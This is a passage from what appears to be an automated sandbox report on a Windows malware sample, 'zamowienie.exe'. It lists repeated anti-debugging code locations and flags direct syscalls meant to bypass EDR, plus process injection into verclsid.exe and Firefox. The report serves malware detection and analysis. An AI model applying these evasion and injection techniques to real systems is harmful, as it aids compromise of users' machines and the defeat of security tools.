    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F872A0 mov eax, dword ptr fs:[00000030h]3_2_34F872A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F872A0 mov eax, dword ptr fs:[00000030h]3_2_34F872A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB92A6 mov eax, dword ptr fs:[00000030h]3_2_34FB92A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2329E mov eax, dword ptr fs:[00000030h]3_2_34F2329E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2329E mov eax, dword ptr fs:[00000030h]3_2_34F2329E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5283 mov eax, dword ptr fs:[00000030h]3_2_34FC5283
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F31270 mov eax, dword ptr fs:[00000030h]3_2_34F31270
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F31270 mov eax, dword ptr fs:[00000030h]3_2_34F31270
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F19274 mov eax, dword ptr fs:[00000030h]3_2_34F19274
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBD26B mov eax, dword ptr fs:[00000030h]3_2_34FBD26B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBD26B mov eax, dword ptr fs:[00000030h]3_2_34FBD26B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7D250 mov ecx, dword ptr fs:[00000030h]3_2_34F7D250
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAB256 mov eax, dword ptr fs:[00000030h]3_2_34FAB256
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAB256 mov eax, dword ptr fs:[00000030h]3_2_34FAB256
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9240 mov eax, dword ptr fs:[00000030h]3_2_34EE9240
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9240 mov eax, dword ptr fs:[00000030h]3_2_34EE9240
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2724D mov eax, dword ptr fs:[00000030h]3_2_34F2724D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5227 mov eax, dword ptr fs:[00000030h]3_2_34FC5227
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F27208 mov eax, dword ptr fs:[00000030h]3_2_34F27208
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F27208 mov eax, dword ptr fs:[00000030h]3_2_34F27208
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC53FC mov eax, dword ptr fs:[00000030h]3_2_34FC53FC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF3E6 mov eax, dword ptr fs:[00000030h]3_2_34FAF3E6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAB3D0 mov ecx, dword ptr fs:[00000030h]3_2_34FAB3D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F913B9 mov eax, dword ptr fs:[00000030h]3_2_34F913B9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F913B9 mov eax, dword ptr fs:[00000030h]3_2_34F913B9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F913B9 mov eax, dword ptr fs:[00000030h]3_2_34F913B9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F233A0 mov eax, dword ptr fs:[00000030h]3_2_34F233A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F233A0 mov eax, dword ptr fs:[00000030h]3_2_34F233A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F133A5 mov eax, dword ptr fs:[00000030h]3_2_34F133A5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC539D mov eax, dword ptr fs:[00000030h]3_2_34FC539D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F4739A mov eax, dword ptr fs:[00000030h]3_2_34F4739A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F4739A mov eax, dword ptr fs:[00000030h]3_2_34F4739A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F93370 mov eax, dword ptr fs:[00000030h]3_2_34F93370
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF367 mov eax, dword ptr fs:[00000030h]3_2_34FAF367
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF7370 mov eax, dword ptr fs:[00000030h]3_2_34EF7370
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF7370 mov eax, dword ptr fs:[00000030h]3_2_34EF7370
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF7370 mov eax, dword ptr fs:[00000030h]3_2_34EF7370
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EED34C mov eax, dword ptr fs:[00000030h]3_2_34EED34C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EED34C mov eax, dword ptr fs:[00000030h]3_2_34EED34C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5341 mov eax, dword ptr fs:[00000030h]3_2_34FC5341
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9353 mov eax, dword ptr fs:[00000030h]3_2_34EE9353
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9353 mov eax, dword ptr fs:[00000030h]3_2_34EE9353
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB132D mov eax, dword ptr fs:[00000030h]3_2_34FB132D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB132D mov eax, dword ptr fs:[00000030h]3_2_34FB132D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F32A mov eax, dword ptr fs:[00000030h]3_2_34F1F32A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7330 mov eax, dword ptr fs:[00000030h]3_2_34EE7330
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7930B mov eax, dword ptr fs:[00000030h]3_2_34F7930B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7930B mov eax, dword ptr fs:[00000030h]3_2_34F7930B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7930B mov eax, dword ptr fs:[00000030h]3_2_34F7930B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F91CF9 mov eax, dword ptr fs:[00000030h]3_2_34F91CF9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F91CF9 mov eax, dword ptr fs:[00000030h]3_2_34F91CF9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F91CF9 mov eax, dword ptr fs:[00000030h]3_2_34F91CF9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9FCDF mov eax, dword ptr fs:[00000030h]3_2_34F9FCDF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9FCDF mov eax, dword ptr fs:[00000030h]3_2_34F9FCDF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9FCDF mov eax, dword ptr fs:[00000030h]3_2_34F9FCDF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F73CDB mov eax, dword ptr fs:[00000030h]3_2_34F73CDB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F73CDB mov eax, dword ptr fs:[00000030h]3_2_34F73CDB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F73CDB mov eax, dword ptr fs:[00000030h]3_2_34F73CDB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F25CC0 mov eax, dword ptr fs:[00000030h]3_2_34F25CC0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F25CC0 mov eax, dword ptr fs:[00000030h]3_2_34F25CC0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01CC7 mov eax, dword ptr fs:[00000030h]3_2_34F01CC7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01CC7 mov eax, dword ptr fs:[00000030h]3_2_34F01CC7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7CD5 mov eax, dword ptr fs:[00000030h]3_2_34EE7CD5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7CD5 mov eax, dword ptr fs:[00000030h]3_2_34EE7CD5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7CD5 mov eax, dword ptr fs:[00000030h]3_2_34EE7CD5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7CD5 mov eax, dword ptr fs:[00000030h]3_2_34EE7CD5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7CD5 mov eax, dword ptr fs:[00000030h]3_2_34EE7CD5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEDCA0 mov eax, dword ptr fs:[00000030h]3_2_34EEDCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFCAB mov eax, dword ptr fs:[00000030h]3_2_34FAFCAB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1FCA0 mov ecx, dword ptr fs:[00000030h]3_2_34F1FCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1FCA0 mov eax, dword ptr fs:[00000030h]3_2_34F1FCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1FCA0 mov eax, dword ptr fs:[00000030h]3_2_34F1FCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1FCA0 mov eax, dword ptr fs:[00000030h]3_2_34F1FCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1FCA0 mov eax, dword ptr fs:[00000030h]3_2_34F1FCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2BCA0 mov eax, dword ptr fs:[00000030h]3_2_34F2BCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2BCA0 mov eax, dword ptr fs:[00000030h]3_2_34F2BCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2BCA0 mov ecx, dword ptr fs:[00000030h]3_2_34F2BCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2BCA0 mov eax, dword ptr fs:[00000030h]3_2_34F2BCA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3C84 mov eax, dword ptr fs:[00000030h]3_2_34EF3C84
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3C84 mov eax, dword ptr fs:[00000030h]3_2_34EF3C84
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3C84 mov eax, dword ptr fs:[00000030h]3_2_34EF3C84
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3C84 mov eax, dword ptr fs:[00000030h]3_2_34EF3C84
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F21C7C mov eax, dword ptr fs:[00000030h]3_2_34F21C7C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01C60 mov eax, dword ptr fs:[00000030h]3_2_34F01C60
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7C40 mov eax, dword ptr fs:[00000030h]3_2_34EE7C40
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7C40 mov ecx, dword ptr fs:[00000030h]3_2_34EE7C40
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7C40 mov eax, dword ptr fs:[00000030h]3_2_34EE7C40
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE7C40 mov eax, dword ptr fs:[00000030h]3_2_34EE7C40
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAFC4F mov eax, dword ptr fs:[00000030h]3_2_34FAFC4F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC1C3C mov eax, dword ptr fs:[00000030h]3_2_34FC1C3C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F79C32 mov eax, dword ptr fs:[00000030h]3_2_34F79C32
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2BC3B mov esi, dword ptr fs:[00000030h]3_2_34F2BC3B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBDC27 mov eax, dword ptr fs:[00000030h]3_2_34FBDC27
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBDC27 mov eax, dword ptr fs:[00000030h]3_2_34FBDC27
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBDC27 mov eax, dword ptr fs:[00000030h]3_2_34FBDC27
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7BC10 mov eax, dword ptr fs:[00000030h]3_2_34F7BC10
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7BC10 mov eax, dword ptr fs:[00000030h]3_2_34F7BC10
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7BC10 mov ecx, dword ptr fs:[00000030h]3_2_34F7BC10
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCBC01 mov eax, dword ptr fs:[00000030h]3_2_34FCBC01
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCBC01 mov eax, dword ptr fs:[00000030h]3_2_34FCBC01
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7DDC0 mov eax, dword ptr fs:[00000030h]3_2_34F7DDC0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBDDC6 mov eax, dword ptr fs:[00000030h]3_2_34FBDDC6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FADDC7 mov eax, dword ptr fs:[00000030h]3_2_34FADDC7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3DD0 mov eax, dword ptr fs:[00000030h]3_2_34EF3DD0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3DD0 mov eax, dword ptr fs:[00000030h]3_2_34EF3DD0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0DDB1 mov eax, dword ptr fs:[00000030h]3_2_34F0DDB1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0DDB1 mov eax, dword ptr fs:[00000030h]3_2_34F0DDB1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0DDB1 mov eax, dword ptr fs:[00000030h]3_2_34F0DDB1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFFDA9 mov eax, dword ptr fs:[00000030h]3_2_34EFFDA9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7DDB1 mov eax, dword ptr fs:[00000030h]3_2_34F7DDB1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F85DA0 mov eax, dword ptr fs:[00000030h]3_2_34F85DA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F85DA0 mov eax, dword ptr fs:[00000030h]3_2_34F85DA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F85DA0 mov eax, dword ptr fs:[00000030h]3_2_34F85DA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F85DA0 mov ecx, dword ptr fs:[00000030h]3_2_34F85DA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F29DAF mov eax, dword ptr fs:[00000030h]3_2_34F29DAF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEFD80 mov eax, dword ptr fs:[00000030h]3_2_34EEFD80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9D96 mov eax, dword ptr fs:[00000030h]3_2_34EE9D96

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Found direct / indirect Syscall (likely to bypass EDR)
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtTerminateThread: Direct from: 0x76EE7B2EJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtClose: Direct from: 0x76EF2B6C
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: NULL target: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeSection loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
    Modifies the context of a thread in another process (thread injection)
    Source: C:\Windows\SysWOW64\verclsid.exeThread register set: target process: 6164Jump to behavior
    Queues an APC in another process (thread injection)
    Source: C:\Windows\SysWOW64\verclsid.exeThread APC queued: target process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeProcess created: C:\Users\user\Desktop\zamowienie.exe "C:\Users\user\Desktop\zamowienie.exe"Jump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exeProcess created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
